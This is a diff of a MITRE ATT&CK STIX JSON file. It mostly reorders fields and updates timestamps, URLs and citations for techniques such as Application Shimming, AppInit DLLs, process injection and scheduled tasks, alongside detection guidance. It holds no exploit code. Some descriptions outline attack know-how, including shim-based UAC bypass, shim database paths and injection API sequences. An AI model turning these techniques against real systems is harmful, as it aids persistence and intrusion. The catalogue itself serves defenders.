+ "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
"x_mitre_data_sources": [
"Windows Registry",
"Process command-line parameters",
"Process monitoring",
"Loaded DLLs"
],
- "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_effective_permissions": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_system_requirements": [
- "Secure boot disabled on systems running Windows 8 and later"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b",
@@ -931,14 +940,14 @@
"url": "https://attack.mitre.org/techniques/T1155"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/",
"description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.",
"source_name": "Macro Malware Targets Macs"
}
],
"revoked": true,
"type": "attack-pattern",
- "modified": "2020-03-09T14:09:08.637Z",
+ "modified": "2020-04-14T13:26:00.846Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -954,7 +963,7 @@
"description": "Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020."
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/",
"description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.",
"source_name": "Macro Malware Targets Macs"
}
@@ -973,21 +982,21 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T16:44:34.580Z",
+ "modified": "2020-04-14T13:28:17.696Z",
"created": "2020-03-09T14:07:54.329Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -1072,9 +1081,15 @@
],
"modified": "2020-03-23T20:24:52.899Z",
"created": "2020-01-30T17:37:22.261Z",
- "x_mitre_platforms": [
- "Office 365",
- "SaaS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
+ ],
+ "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
+ "x_mitre_data_sources": [
+ "Office 365 audit logs",
+ "OAuth audit logs"
],
"x_mitre_contributors": [
"Shailesh Tiwary (Indian Army)",
@@ -1082,16 +1097,10 @@
"Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
"Mark Wee"
],
- "x_mitre_data_sources": [
- "Office 365 audit logs",
- "OAuth audit logs"
- ],
- "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Office 365",
+ "SaaS"
+ ]
},
{
"external_references": [
@@ -1147,6 +1156,20 @@
],
"modified": "2020-03-29T02:01:10.832Z",
"created": "2020-02-20T15:35:00.025Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.",
+ "x_mitre_data_sources": [
+ "Network device logs",
+ "Network device logs",
+ "Network intrusion detection system",
+ "Web application firewall logs",
+ "Web logs",
+ "SSL/TLS inspection"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1157,26 +1180,22 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Network device logs",
- "Network device logs",
- "Network intrusion detection system",
- "Web application firewall logs",
- "Web logs",
- "SSL/TLS inspection"
- ],
- "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:56.776Z",
+ "modified": "2020-03-27T19:02:44.772Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Application Layer Protocol",
+ "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
"external_references": [
{
"source_name": "mitre-attack",
@@ -1189,19 +1208,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
- "name": "Application Layer Protocol",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-27T19:02:44.772Z",
- "created": "2017-05-31T21:30:56.776Z",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
@@ -1257,6 +1266,11 @@
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"source_name": "Endgame Process Injection July 2017"
},
+ {
+ "source_name": "FireEye Application Shimming",
+ "url": "http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf",
+ "description": "Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020."
+ },
{
"url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf",
"description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.",
@@ -1268,7 +1282,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Application Shimming",
- "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
+ "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
"id": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -1281,22 +1295,22 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T21:28:29.648Z",
+ "modified": "2020-05-04T19:05:30.140Z",
"created": "2020-01-24T14:56:24.231Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Windows Registry"
],
- "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
@@ -1322,21 +1336,21 @@
],
"modified": "2020-03-26T15:44:27.068Z",
"created": "2017-05-31T21:30:24.512Z",
- "x_mitre_version": "1.1",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_data_sources": [
- "API monitoring",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "User"
],
"x_mitre_platforms": [
"macOS",
"Windows"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_data_sources": [
+ "API monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -1367,6 +1381,19 @@
],
"modified": "2020-03-29T02:07:27.508Z",
"created": "2020-02-20T15:37:27.052Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.",
+ "x_mitre_data_sources": [
+ "Network device logs",
+ "Network intrusion detection system",
+ "Web application firewall logs",
+ "Web logs",
+ "SSL/TLS inspection"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1377,22 +1404,25 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Network device logs",
- "Network intrusion detection system",
- "Web application firewall logs",
- "Web logs",
- "SSL/TLS inspection"
- ],
- "x_mitre_detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
+ "created": "2020-02-20T20:53:45.725Z",
+ "modified": "2020-03-29T18:27:31.040Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
+ "name": "Archive Collected Data",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -1405,22 +1435,6 @@
"source_name": "Wikipedia File Header Signatures"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Archive Collected Data",
- "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
- "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-29T18:27:31.040Z",
- "created": "2020-02-20T20:53:45.725Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1437,6 +1451,22 @@
"x_mitre_version": "1.0"
},
{
+ "created": "2020-02-20T21:09:55.995Z",
+ "modified": "2020-03-25T22:48:14.605Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
+ "name": "Archive via Custom Method",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -1449,22 +1479,6 @@
"source_name": "ESET Sednit Part 2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Archive via Custom Method",
- "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
- "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-25T22:48:14.605Z",
- "created": "2020-02-20T21:09:55.995Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1518,18 +1532,18 @@
],
"modified": "2020-03-29T18:27:30.891Z",
"created": "2020-02-20T21:08:52.529Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -1575,20 +1589,20 @@
],
"modified": "2020-03-25T21:54:37.374Z",
"created": "2020-02-20T21:01:25.428Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"File monitoring",
"Binary file metadata"
],
- "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -1629,11 +1643,9 @@
],
"modified": "2020-03-30T00:37:16.593Z",
"created": "2020-03-16T15:48:33.882Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -1641,9 +1653,11 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -1696,21 +1710,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-23T13:20:55.893Z",
+ "modified": "2020-06-20T22:17:05.394Z",
"created": "2020-01-14T01:29:43.786Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -1750,17 +1764,17 @@
],
"modified": "2020-03-23T22:35:13.112Z",
"created": "2019-12-03T12:59:36.749Z",
- "x_mitre_platforms": [
- "Linux"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": true,
+ "x_mitre_detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_remote_support": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"external_references": [
@@ -1819,21 +1833,21 @@
],
"modified": "2020-03-24T13:43:40.776Z",
"created": "2019-11-27T13:52:45.853Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - 